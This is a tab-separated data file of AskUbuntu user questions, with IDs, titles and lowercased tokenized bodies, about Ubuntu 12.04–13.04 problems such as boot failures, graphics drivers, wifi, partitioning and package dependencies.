289878	auto-completion does not work with sudo mount	i 'm using 12.04.2 and auto-completion for mount does not work with sudo . if i do n't use sudo auto-completion works as expected : $ mount -- bind -t devpts /dev/ < press tab > block/ char/ dri/ input/ pts/ .udev/ ( ... ) bus/ disk/ .initramfs/ net/ snd/ vboxusb/ this is very annoying when you have paths like /media/ < uuid > . also this is the only command i have seen that does this : sudo umount or sudo apt-get works as expected . so how can i debug the problem/fix this ?
289880	installed ubuntu 12.04lts with wubi and boot to black screen with cursor and a error	if i hit pause at boot it displays this ( hd0,0 ) : ntfs5 : error `` prefix '' is not set . does anyone know what this is ? i 've checked out the other questions that may have an answer but could not get any to work . is there something else i can try ? thanks for any help provided !
289881	how to set up a bootable truecrypt usb with ubuntu on it ?	oddly enough , i have n't found the solution to this yet , unless i 've misinterpreted the search results i 've been seeing . i want to encrypt a usb flash drive so that i can select `` boot from usb '' on any machine , and truecrypt will load from the drive itself and then ubuntu will boot from the decrypted drive .
289885	problem upgrading from12.10 to 13.04	i recently tried to upgrade my system to 13.4 , but in the middle of the the upgrade , system crashed . when i try to restart it goes to a slow and sluggish mode . please help .
289888	game playing on both screens	i have dual monitors setup on 13.04 with an ati card using the propitiatory driver . in install steam then amnesia and started the game up . the displays are mirroring instead of the game just playing on one . is there a way to fix this ?
289892	raring on laptop with two gpus : black screen	i bootet my macbook 8-2 with kubuntu rarings normal live cd mode : only discrete amd gpu found , everthings fine . efi installer ( efi mode needed to use other gpu ) : screen goes black ( even on ttys ) . so i do the same , but use nomodeset on the grub line : splash and installer gui show , but `` try kubuntu '' ( live cd mode ) gives black screen . i install kubuntu , reboot , boot holds : radeondrmfb has a problem taking away the framebuffer from the intel driver ( two gpus ) . so i use nomodeset again . splash , boot runs through to text login , no x : lightdm not running . xorg.log tells me `` no displays found '' . any ideas ? basically i just want to use intel igpu to save battery .
289896	trouble with asus n-13 usb wireless adapter	complete noob here . i 've just installed 12.04 lts on an old computer , a dell dimension e520 , and i 'm trying to get my asus n-13 adapter to work properly . when i plug it in , it connects like it should and it works for 5-10 minutes , but then it randomly stops working and i need to take it out and plug it back it to make it start working again . it never actually says it 's lost the connection , it just stops working . if it helps , the light on the adapter is lit constantly , and when the adapter was working properly on a different computer , it would blink on and off sporadically . i followed the advice on this thread : connecting asus usb-n13 wireless adapter i installed the drivers and got the output specified , but the problem is persisting after rebooting . please help askubuntu . here 's my lsusb output : bus 001 device 004 : id 0b05:17ab asustek computer , inc . bus 003 device 002 : id 046d : c016 logitech , inc. optical wheel mouse bus 003 device 003 : id 413c:2105 dell computer corp. model l100 keyboard bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub
289897	wifi connectivity issues in 13.04	i installed ubuntu 13.04 and have been experiencing lossy wifi connections . this seems to only be an issue when i am at school . we use wpa2 enterprise with peap enabled and mschapv2 to connect to the network . we do not use certificates and i have already found a bug with that . ( had to remove a line 20 from the profile in network manager . `` certificate=true '' ) my question is , how do i keep from getting booted every 15 minutes or so ? at home i can stay connected for hours it seems and on windows 7 enterprise x64 i had no issues . googling this issue seems to bring up similar issues and one solution has been to use wicd but i have tried that and i could not successfully use that app due to a weird password error issue . here is my wifi card : realtek rtl8188ce 802.11b/g/n i need to be able to access wifi while on campus due to the fact that there is no way for me to utilize ethernet connections .
289898	ca n't execute file as a program in ubuntu 13.04	i 've been trying to execute a file as a program . i own it and i ticked the box in the permissions and saved it clicked on it again it reopen the editor how to execute it as a program as it was in ubuntu 12.10 ?
289902	managing virtualbox on ubuntu server	we have some windows product testers that need versions of windows to test on . i was wondering if there 's a way to install ubuntu server , and then virtualbox , and then host these sessions over the rdp protocol simultaneously so that we could have like tester a on windows xp while at the same time have tester b on windows 8 ? can we also have an easy interface to reboot virtualbox instances if they jam up or suddenly shut down , without having to reboot the entire server ?
289903	twitter app in messaging menu	i 've installed friends-app in my ubuntu 13.04 but i ca n't see any twitter app icon under messaging menu . how can i get twitter app icon in messaging menu in ubuntu 13.04 ?
289904	how can i use gwibber in 13.04 ?	i tried to use gwibber instead of friends-app in my ubuntu 13.04 system . i installed gwibber with sudo apt-get install gwibber the installation went fine but i ca n't run gwibber with command gwibber nor can i find gwibber while searching dash . how can i use gwibber with ubuntu 13.04 ?
289907	is there a way to show progress when copying/moving files using the command line ?	sometimes with large files it takes a while and some sort of progress bar to know that its still working would be nice .
289911	ntfsresize -b -f not working chkdsk /r freezing	i 've got a failing hard drive . do n't have the funds atm to buy a new hard drive . so i need to hold up . my main operating system is now ubuntu which is able to run the hard drive fine without any problems . i have ext4 , though for some files on the ntfs partition it runs into problems and may cause to freeze up . i 've ran programs like hd regenerator , but to fix my hard drive completely with that it would take over a week of non-stop running . if i try to boot into windows safe mode it freezes up after 20 seconds , can still move the mouse , but nothing responds if i click . so i need to move my ntfs files onto a ext4 partition , i have not seen any corruption on ext4 even though i 've been using as my primary for quite some time . 425gb ntfs , 46gb ext4 , 4gb linux swap file data is how it 's arranged on my hard drive i am just looking to recover the most important stuff like documents . bunch of pdf 's , djvu , odt close to 50gb worth of stuff . there 's about 80gb worth of free ntfs space which i 'm unable to use atm . booting the windows 7 installation disk , running chkdsk /f checks out fine with no problems , with 112kb of bad sectors . chkdsk /r freezed at the 4th step at 17 % . i need to run this because ntfsresize wo n't allow me to resize when running the force and force bad sector command . i set it to : sudo ntfsresize -f -b -s 345g /dev/sda2 and get warning drive has found 29 bad sectors , must run chkdsk /f before continuing . something like that , do n't feel like booting back into a live cd to get the exact error . now one thing i am considering if i can not shrink this pesky ntfs is to run ntfsundelete as shown here . so my hard partitions would be arranged as so ext4 345gb ext4 74gb where i would recover the files from ntfs 46gb ext4 4gb swap file . i am concerned that the data might be spread evenly across the sectors for the entire ntfs partition which is why i am asking here first . how do i shrink this pesky partition or would it be safe to create these two new ext4 partitions in gparted and proceed to run ntfsundelete ?
289916	after 13.04 install : unable to enter online accounts	in system settings after an upgrade from 12.10 to 13.04 i am not longer able to add online accounts . ( i noticed this after launching empathy , which prompted me : `` you need to set up an account to see contacts here . '' ) i had an aim account already configured but was not able to see my aim contacts . i tried to remove the aim account and re-add , but the system settings panes for online accounts does not have any fields for adding account info , just : `` please enter your account details cancel/done '' .
289918	installing ubuntu serfer after ubuntu desktop	i have ubuntu desktop . how do i install lamp to run on it or can i ?
289925	why can i not connect to my wireless network after i upgraded to 13.04 ?	i just upgraded to 13.04 from 12.10 and discovered i was unable to connect to my home wireless network even though i can detect the network ( and neighboring networks ) . however , i was able to connect via an ethernet cable to the router . i noticed quite a few people were having similar issues and was wondering if anybody had reached a breakthrough . i tried disabling and re-enabling the wireless card , rebooting the computer , and rebooting the router all to no avail . some miscellaneous facts : i am running a broadcom 4313 wireless card and my computer is a dell n5010 . my region is usa . when i upgraded to 12.10 , i had to reinstall the driver set for bcmwl .
289926	upgrade to ubuntu 13.04 problem - boots into blank black screen	after upgrade my desktop system ( asrock z77 , intel i5 , geforce gtx 650 , 16 gb ram ) can only boot to a black screen . i mean after the grub interface ( kernel is 3.8.8-19-generic ) and purple screen . i have attempted pretty much every work around listed that i have been able to locate on the forums and elsewhere , here are a couple of resources ( if anyone else is having a similar issue ) : blankscreen how to set nomodeset and other kernel boot options in grub2 i have modified grub entry several times in different ways . it tends to hang at this point with statement `` loading initial ramdisk ... '' attempted to reinstall ubuntu 's system files following ubuntureinstallation guide , but : ( i . ) option to upgrade is not available ; ( ii . ) install via manual partitioning ( something-else ) has issues , when i select the `` sda1 '' partition and click install now i get an error message saying that `` no root file system is defined '' . **this error message occurs regardless of setting mount point as `` / '' i then tried 'boot repair ' , thinking it might be something that could help : http : //paste.ubuntu.com/5627802/ i am at the point that i am thinking the microsoft solution for serious bsod was to take the box outside and shoot it or toss it off a bridge from a moving vehicle is the only viable option . if anyone can help , make some suggestions - it would be greatly appreciated . thanks in advance . footnote : sunday 10th may 2013 over the last week , i have attempted multiple times to create a work around to this 'blank screen ' issue . to the point i have built a second identical machine , two separate nvidia graphics cards ( gtx650 & gts450 ) to play around on with fresh installs of 12.10 and 13.04 i have followed numerous suggestions from forum threads , bug reports and askubuntu posts : ubuntu 12.10 / 13.04 sudo apt-add-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get install nvidia-current nvidia-settings sudo apt-get install linux-headers-generic sudo apt-get -- reinstall nvidia-current nvidia-settings sudo reboot as well as : sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current nvidia-settings sudo apt-get install linux-headers-generic sudo apt-get -- reinstall nvidia-current nvidia-settings sudo reboot i have done the 'remove ' : sudo apt-remove nvidia-current nvidia-common sudo apt-remove nvidia-current-updates i have 'reconfigured ' : sudo dpkg-reconfigure nvidia-current sudo dpkg-reconfigure nvidia-current-updates i have purged the butthead drivers released by nvidia : sudo apt-get purge nvidia* ; sudo rm /etc/x11/xorg.conf installed new nvidia drivers ( 310 , 319 ) following some of the above : sudo apt-get install-experimental-319 sudo apt-get install-319-updates cleared nouveau ( as it was not being blacklisted ) : sudo apt-get -- purge remove xserver-xorg-video-nouveau sudo apt-get install linux-headers-'uname -r' sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current nvidia-settings sudo apt-get-alternatives -- config gl_conf sudo ldconfig sudo update-initramfs -u sudo nvidia-xconfig redone unity by installing 'dconf-tools ' . original and test system both have nvidia graphics cards to which monitors are attached , however neither appear in 'additional drivers ' . in the case of the test system , this is regardless of whether the card is in the pci slot with fresh install or added later in both 12.10 and 13.04 . when i do : 'lsmod | grep -i nv ' after install nvidia , the nvida data is there , but the system still boots into blank screen . i have played with 'lightdm ' and 'nomodeset ' . in the case of editing grub to add 'nomodeset ' in test system , this causes the system to hang after 'loading initial ramdisk ... ' so , if anyone has some thoughts , i am all ears .
289928	setting up ssd+hdd storage properly	so the other day i purchased a 128gb ssd for my desktop . currently i run 12.10 on a sata drive , but want to do a clean install on the ssd and run that as the main os drive+apps . i 've been reading everywhere that i should set up a hdd as a 'storage ' drive , for all data not going on the ssd . this is logical , and i will be using the 300gb drive i currently do -- but my question is , is there any way to make that hdd the 'default ' save-space for the os ? what i mean is that , i assume when i install ubuntu on the ssd it will establish all the folders ( docs , pics , videos , downloads & c & c ) and will want to -- by default -- access these whenever i click into them . is there a way to set that up on a separate drive and 'default ' in to that , rather than the ssd ? thanks !
289936	where is update manager ?	software center dosent give me the option to upgrade my distribution , just programs , and i cant find update manager anywhere
289940	remove title-bar of all maximized gnome 3.8 windows	( gnome-shell , 13.04 , upgraded , gnome 3.8 ) recently , i upgraded ubuntu to 13.04. the default desktop is gnome-shell . except nautilus , other software border does n't disappear when i make them to be maximized . i checked the problem for these software : libreoffice firefox rhythmbox thunderbird gnome-terminal on the other hand there are three bars on maximized mode : gnome-shell panel title-bar for software which contains -+x buttons . software menu-bar number `` 2 '' is extra . is a package missing ?
289942	alternatives for burp suite in linux	as i understand , burp suite helps in creating proxy listeners on local address and thus intercept the communication between the browser and the internet . is there any similar software in ubuntu .
289944	external hard drive not detected ubuntu 12.10	my 1 tb external hard disk is not detected by ubuntu 12.10 . **lsusb : ** bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 003 : id 0c45:6409 microdia webcam bus 002 device 003 : id 046d : c03d logitech , inc. m-bt96a pilot optical mouse bus 002 device 004 : id 046d : c315 logitech , inc. classic new touch keyboard bus 002 device 007 : id 059b:0070 iomega corp. **sudo fdisk -l : ** disk /dev/sda : 640.1 gb , 640135028736 bytes 255 heads , 63 sectors/track , 77825 cylinders , total 1250263728 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0006ec0d device boot start end blocks id system /dev/sda1 * 2048 1242566655 621282304 83 linux /dev/sda2 1242568702 1250263039 3847169 5 extended /dev/sda5 1242568704 1250263039 3847168 82 linux swap / solaris **sudo blkid : ** /dev/sda1 : uuid= '' 9d449e79-8917-497f-aa4c-59fb3bcb21ee '' type= '' ext4 '' /dev/sda5 : uuid= '' ea2d407e-0b84-4d6e-9004-5b3536a899fd '' type= '' swap ''
289945	“mozilla_five_home not set” zekr quran ubuntu 13.04 error	i have installed zekr quran study software in ubuntu 13.04 , but it showes error org.eclipse.swt.swterror : no more handles [ unknown mozilla path ( mozilla_five_home not set ) ] at org.eclipse.swt.swt.error ( swt.java:4387 ) at org.eclipse.swt.browser.mozilla.initmozilla ( mozilla.java:1939 ) at org.eclipse.swt.browser.mozilla.create ( mozilla.java:699 ) at org.eclipse.swt.browser.browser . ( browser.java:99 ) at net.sf.zekr.ui.quranform.makeframe ( quranform.java:628 ) at net.sf.zekr.ui.quranform.init ( quranform.java:340 ) at net.sf.zekr.ui.quranform . ( quranform.java:319 ) at net.sf.zekr.zekrmain.startzekr ( zekrmain.java:51 ) at net.sf.zekr.zekrmain.main ( zekrmain.java:94 ) then i executed the following commands tcsh setenv mozilla_five_home /usr/lib/firefox setenv ld_library_path $ { mozilla_five_home } : $ { ld_library_path } ` but it showes error again ld_library_path : undefined variable . now what should i do ? pls help .
289950	do i need linux-libc-dev and libc6-dev ?	i removed the stock 3.8.0-19-generic kernel ( and meta packages for the stock ubuntu kernel ) and installed the 3.9 mainline kernel , do i need these 2 packages or can i remove them ? ~ $ apt-cache policy linux-libc-dev linux-libc-dev : installed : 3.8.0-19.29 candidate : 3.8.0-19.30 version table : 3.8.0-19.30 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ raring-security/main amd64 packages *** 3.8.0-19.29 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring/main amd64 packages 100 /var/lib/dpkg/status ~ $ apt-cache policy libc6-dev libc6-dev : installed : 2.17-0ubuntu5 candidate : 2.17-0ubuntu5 version table : *** 2.17-0ubuntu5 0 500 http : //us.archive.ubuntu.com/ubuntu/ raring/main amd64 packages 100 /var/lib/dpkg/statusi completely removed ( aka purged ) all of these : linux-generic linux-image-generic linux-headers-generic linux-image-extra-3.8.0-19-generic linux-image-3.8.0-19-generic linux-headers-3.8.0-19-generic linux-headers-3.8.0-19
289961	how to start ubuntu one indicator from command line	i 'm switching to i3 window manager . i want to use the indicator-sync tool from within that desktop environment , but i could n't find the executable for it . where is it ? thanks in advance . update : i 've found /usr/lib/x86_64-linux-gnu/indicator-sync/indicator-sync-service , but it fails with the followin error when called from command line : libindicator-warning ** : no watchers , service timing out .
289964	dawing crystal structure	i need to draw a face centred cubic ( fcc ) and one zincblende crystal structure . which software shall i use to draw those on ubuntu ? thanks
289970	boot - ubuntu hangs at purple screen after upgrade to 13.04	i was using ubuntu 12.10 and upgraded to 13.04 now ubuntu just hangs at purple screen . i have tried installed kdm and switched to kdm . i get the login prompt at kdm but login fails and shows up the login prompt repeatedly . tried many times with no success . using nvidia packages lightgdm nodm what can i do to fix the problem and re-install 13.04 ?
289971	usb 's storage capacity reduced to 2 mb from 16 gb	i downloaded ubuntu-13.04-desktop-amd64 . on ubuntu 's web page , i saw a link for making a bootable usb drive option , then i downloaded universal-usb-installer-1.9.3.3 and i made my usb bootable . when installing the os an error was found and installing not completed . after that i formated my usb but my usb 's storage capacity reduced to 2 mb from 16 gb . how can i recover my usb size and install ubuntu .
289977	grub rescue unknown filesystem error . grub corrupted or filesystem ?	now it has happened twice & have been pulling my hairs now ... i have installed xubuntu on my external hardisk & have been using it for about 3 months . it has three partitions , one of 500 mb mounted at /boot , 2nd one of 48gb mounted at / & the rest ( out of 160gb ) is ntfs partition ... .used as normal external storage . the last storage supposedly acts as a buffer b/w linux distributions & win platform , buffer in the sense that it provides a universal channel for data transfers . i have constantly used this external hardisk for data transfers b/w win7 laptop & xubuntu ( on this external hd ) without any hassle . however , on of my desktops where i have ubuntu i ( for the first time ) attached this external drive which let me do data transfers where all three partitions properly mounted ... .but then nasty thing occurred the same that occurred before . i ( as usual ) tried booting via this external hd ( one having xubuntu , one having being formerly used under ubuntu ) i got error now i am totally devastated because similar thing happened ~6months before when i had fedora 17 in my external hd ( instead of xubuntu ) & after it was used under ubuntu the same happened ... i did n't reported it because i already had planned towards debian instead of rpm ! the mystery is that as long as i do n't attach this external hd under ubuntu the data never** corrupts whereas under win xp/7 i can use it as a normal usb storage of coarse linux partitions arenât available under win platforms ... **from corrupts i mean hd fails to boot with the error mentioned however cant say whether data within remains untouched ? it seems that my grub & or mbr is corrupted . please sir guide me to solve this issue also why i cant attach & use linux external hds under linux platform disk /dev/sdc : 160.0 gb , 160041884672 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581806 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0004e7d0 device boot start end blocks id system /dev/sdc1 * 2048 976895 487424 83 linux /dev/sdc2 978942 96874495 47947777 5 extended /dev/sdc3 96874496 312575999 107850752 7 hpfs/ntfs/exfat /dev/sdc5 978944 94726143 46873600 83 linux /dev/sdc6 94728192 96874495 1073152 82 linux swap / solaris i can recall for sure that have seen a thread here when a similar problem occurred & in response someone gave solution of how to mount ( now invisible ) partitions & recover important data in them . i have misplaced that url so if any can guide me thither because my important documents resides in / partition what i already have done : without success i have tried this & related solutions what i plan to do : i believe that filesystem has corrupted & would you recommend solution like this provided i cant recall whether my /boot ( 500mb ) partition was ext4 or ext2 though i am sure that my / ( 48gb ) partition was ext4 update 1 attached my external hd under ubuntu ran followinf command as root grub-install /dev/sdc where /dev/sdc was my external hd containing corrupted xubuntu ... .it reported all done ! i re-ran fdisk -l but to my disappointment it reported disk /dev/sdc : 160.0 gb , 160041884672 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581806 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x1b6b9167 disk /dev/sdc does n't contain a valid partition table ... & now i ca n't even access its ntfs partition ( former /dev/sdc3 ) please help ? update 2 testdisk ( by cgsecurity ) failed at founding any partition table : ( testdisk 6.13 , data recovery utility , november 2011 christophe grenier < grenier @ cgsecurity.org > http : //www.cgsecurity.org disk /dev/sdc - 160 gb / 149 gib - chs 19457 255 63 partition start end size in sectors
289980	ubuntu 13.04 install along windows 8 fails	i have a msi fx-600 laptop with core-i3 330m , 4 gb ram , 500 gb hard disk . my laptop comes with windows 7 pre-installed . i have upgraded it to windows 8 recently . as it is with windows 7 pre-installed not windows 8 , i am quite sure uefi is not an issue here . i downloaded ubuntu 13.04 amd64 iso & created live usb using universal linux installer . then i booted my pc from usb and choose install ubuntu/install inside windows 8 [ ? ] . then the computer restarts instantly and starts ubuntu installation from scratch if pendrive is connected , and windows 8 if pendrive is not connected . i searched over the forum & found this . this states that more than 4 primary partition ca n't be created . but i personally created only 2 partitions & do n't intend to reduce further . my partition table using windows disk manager is as follows.my partition table . here the 12 gb partition is the recovery partition & i do n't think it makes sense to remove that . i intend to use some space from 393 gb partition and install ubuntu there . please provide me with step by step instruction to do so . [ ? ] why does it state install inside inside windows , when i intend to install alongside ? i took that as a typo .
289983	ca n't use ubuntu after nvidia driver installation	i 've downloaded the nvidia 319.17 .run driver on www.nvidia.com and i tried to install it in ubuntu 12.04 . so i logged out , i pressed ctrl+alt+f2 and i wrote the following commands : sudo service lightdm stop sudo chmod a+x nvidia-linux-x86_64-319.17.run sudo ./nvidia-linux-x86_64-319.17.run after the nvidia script said the driver was installed succesfully i did : sudo shutdown -r now when rebooting , i see a purple screen then a black screen with a blinking white underscore and that 's all . i waited a few moments but nothing happens . the ubuntu login screen never appears so i had to press the shutdown button to turn off the computer . now i ca n't use ubuntu at all . what can i do to recover after this failed nvidia driver installation ?
289986	qualcomm atheros bigfoot killer e2200 ethernet not working in linux	i recently installed ubuntu -vesrion 12.04 on my system , and it appears it 's a common issue that this ethernet does not work with ubuntu . i stumbled upon this solution . but i do n't think the very first packages to install exist anymore . is there maybe another solution floating around , maybe a more recent solution ? i would really love to move away from the windows platform . i do n't know if this makes a difference , but i am dual booting ubuntu .
289989	wifi enabled on 13.04 but can not connect . tried recommended solution but does not work	i recently upgraded to ubuntu 13.04 from ubuntu 12.10 . however , since then although my wireless network is detected , i can not connect to it . ubuntu keeps on trying to reconnect with the network but is not successful . same machine on windows 8 i am able to connect to the same wireless network . also , ethernet is working fine as i am able to connect to the same network through ethernet on ubuntu . my lspci -nn output is 12:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) 13:00.0 ethernet controller [ 0200 ] : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller [ 10ec:8136 ] ( rev 02 ) i already tried the solution in this post broadcom corp. bcm4313 wirelss not detected in ubuntu 12.10 but it not solving my problem . the situation is the same . please help me . i do not want to switch to using windows again .
289992	invalid efi file path to windows 7	i recently installed on my computer ( along to windows 7 ) the ubuntu 12.04 i downloaded refind software that i could work with both systems ( and it worked just fine ) i updated the ubuntu to the newest version , 13.04 version . now , the efi does n't work with that version . i tried to do the same as i did before and now it 's making me problems and i ca n't even enter windows . p.s : in the meanwhile i 'm using grub 2 and i 'm new with ubuntu . thanks in advance .
289993	linux script command explanation	when i read a script of makefile , i meet with the following linux script command : mv obj/*.o . 2 > /dev/null what does this command mean ? i understand mv obj/*.o . means that all the files with suffix o in the obj folder will be moved to the current folder . what does 2 > mean ? when they are combined together , what is purpose ? thanks !
289997	wireless not working when using ubuntu 13.04 on dell precision m6300	i installed ubuntu 13.04 dual boot with windows 8. all working perfectly well except my wireless . the wireless does not turn on or off . neither it detects any wireless system . fn+f2 does not turn on or off the wireless network . the light indication of wi-fi also doesnt turn on . it is off constantly . i think it contains : dell wireless 1390 or 1395 wlan minicard . plx help asap ! waiting .
289999	installing ubuntu in windows 8 with wubi	i have a computer with windows 7 pre-installed and i recently upgraded it to windows 8 . will wubi work on windows 8 ? also , is it safe to upgrade to 13.04 after installing ubuntu with wubi on my computer ?
290000	ctrl+f find/search not active after clean install of ubuntu 13.04	2 days after a completely clean install of 13.04 and no relevant changes to the system ( keybd shortcuts etc . ) , ctrl+f does not work anywhere , with the exception of chrome , where it opens the `` settings '' window other apps like firefox , thunderbird and libre office have the element ctrl+f grayed out . ( ps for info - i am running english language ubuntu 13.04 with a german keyboard , but never had any problems in the past with this combination ) any ideas ? ?
290002	how can i upgrade from ubuntu 11.10 to 13.04 using minimal cd	i want to upgrade to ubuntu 13.04 from 11.10 . i do n't have a cpu that supports pae , and from what i uderstood , that means i have to use the minimal cd . i am running a dual boot with windows xp , and i just want to upgrade 11.10 to 13.04 without deleting any of my files or messing up my dual boot situation . is that possible with the minimal cd ? will it mess up my partitions , can i choose which partition to install it on ? or am i totally confused and am trying to do the impossible : p ... if it is possible , can i have a step by step explanation of how to do it ? thanks , hopeless newb
290006	how to install latest version of urban terror on ubuntu 12.04 ?	i am new to ubuntu . please tell me how to install the latest version of urban terror . step by step answer would be great .
290008	12.04 64-bit how to solve , pcscd : depends : libccid ( > = 1.4.1~ ) but it is not going to be installed or pcsc-ifd-handler ?	i need to install a package but its failing in 12.04 64 -bit . root @ sun-to-be-filled-by-o-e-m : /var/tmp # apt-get install pcscd reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : eid-viewer : depends : default-jre but it is not going to be installed pcscd : depends : libccid ( > = 1.4.1~ ) but it is not going to be installed or pcsc-ifd-handler e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . root @ sun-to-be-filled-by-o-e-m : ~/downloads/ifdokccid_lnx_x64-3.7.0 # apt-get install libccid reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : eid-mw : depends : pcscd but it is not going to be installed recommends : libacr38u but it is not going to be installed eid-viewer : depends : default-jre but it is not going to be installed depends : pcscd but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . root @ sun-to-be-filled-by-o-e-m : ~/downloads/ifdokccid_lnx_x64-3.7.0 # apt-get -f install pcscd reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : eid-viewer : depends : default-jre but it is not going to be installed pcscd : depends : libccid ( > = 1.4.1~ ) but it is not going to be installed or pcsc-ifd-handler e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . root @ sun-to-be-filled-by-o-e-m : ~/downloads/ifdokccid_lnx_x64-3.7.0 # apt-get -f install pcsc-tools reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : eid-mw : depends : pcscd but it is not going to be installed recommends : libccid but it is not going to be installed recommends : libacr38u but it is not going to be installed eid-viewer : depends : default-jre but it is not going to be installed depends : pcscd but it is not going to be installed pcsc-tools : depends : libpcsc-perl but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) .
290009	how do i make my synclient settings stick ? - ubuntu 13.04	the default setting for synaptics touchpads includes a paste functionality mapped to the upper right corner of the touchpad . i can disable this behavior by running the command synclient rtcornerbutton=0 , but every time i reboot my settings are reverted . how do i prevent this from happening ?
290011	suspend not working using ubuntu 13.04 on acer aspire one	i have just installed ubuntu 13.04 on my acer aspire one d250 . when closing the laptop lid to enter suspend mode the screen turns off , but the hard drive remains active . once open again the screen will not turn on , and a full reboot is needed . how do i fix this ?
290016	ca n't boot properly	so here 's the thing . i installed ubuntu on my pen drive , and the installation went perfectly but now when i 'm starting my pc i am faced with those 3 options again : 1. install 2. try without installing where is the dual boot ? and why is n't ubuntu starting ? but it occupied the drive partitions ... .please help..
290032	how to open terminal inside a folder in nautilus , so that the folder is the current location ?	in dolphin with shift+f4 terminal is opened from current location in dolphin . is there any similar functionality in nautilus ?
290036	resize boot device volume	i 'm wondring how can i resize boot volume because it got 15go of space and he use only 71.7mb only almost 0 % of space . so i want to reduce this space and add it to principle device `` / ''
290038	java 7 not installing because ip not found	tried installing netbeans and eclipse but both give the following errors ( is this caused because the server is down and will be restored soon ? i 've not been able to use apt-get to install the missing packages either . also tried http : //www.oracle.com/technetwork/java/javase/downloads/jdk7-downloads-1880260.html but it says that ls , mkdir etc are missing when it is not actually missing ) : err http : //in.archive.ubuntu.com/ubuntu/ precise-updates/main icedtea-netx-common all 1.2-2ubuntu1.3 404 not found [ ip : 91.189.92.201 80 ] err http : //security.ubuntu.com/ubuntu/ precise-security/main icedtea-netx-common all 1.2-2ubuntu1.3 404 not found [ ip : 91.189.92.202 80 ] err http : //security.ubuntu.com/ubuntu/ precise-security/main icedtea-netx i386 1.2-2ubuntu1.3 404 not found [ ip : 91.189.92.202 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/i/icedtea-web/icedtea-netx-common_1.2-2ubuntu1.3_all.deb 404 not found [ ip : 91.189.92.202 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/i/icedtea-web/icedtea-netx_1.2-2ubuntu1.3_i386.deb 404 not found [ ip : 91.189.92.202 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ?
290042	ati 4850 on 13.04 64bit	to those that can help , i am guessing that you have seen a variant of this problem many times before . however after doing my best to try to use the various fixes mentioned across various pages , i have finally given up ! the problem is that i can not run unity - because i can not install the legacy drivers properly in 13.04 . when i input sudo apt-get install fglrx-legacy step after doing the previous 3 steps ( which seem to run fine ) i get the following output : $ sudo apt-get install fglrx-legacy reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : fglrx-amdcccle-legacy fglrx-legacy-dev the following new packages will be installed fglrx-amdcccle-legacy fglrx-legacy fglrx-legacy-dev 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/72.4 mb of archives . after this operation , 24.6 kb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously unselected package fglrx-legacy-dev . ( reading database ... 201264 files and directories currently installed . ) unpacking fglrx-legacy-dev ( from ... /fglrx-legacy-dev_2 % 3a8.97.100.7-makson1~raring2_amd64.deb ) ... unpacking fglrx-legacy ( from ... /fglrx-legacy_2 % 3a8.97.100.7-makson1~raring2_amd64.deb ) ... one or more files have been altered since installation . uninstall will not be completed . see /etc/ati/fglrx-uninstall.log for details . dpkg : error processing /var/cache/apt/archives/fglrx-legacy_2 % 3a8.97.100.7-makson1~raring2_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 selecting previously unselected package fglrx-amdcccle-legacy . unpacking fglrx-amdcccle-legacy ( from ... /fglrx-amdcccle-legacy_2 % 3a8.97.100.7-makson1~raring2_amd64.deb ) ... errors were encountered while processing : /var/cache/apt/archives/fglrx-legacy_2 % 3a8.97.100.7-makson1~raring2_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any help is much appreciated . i am an ubuntu noob . thanks .
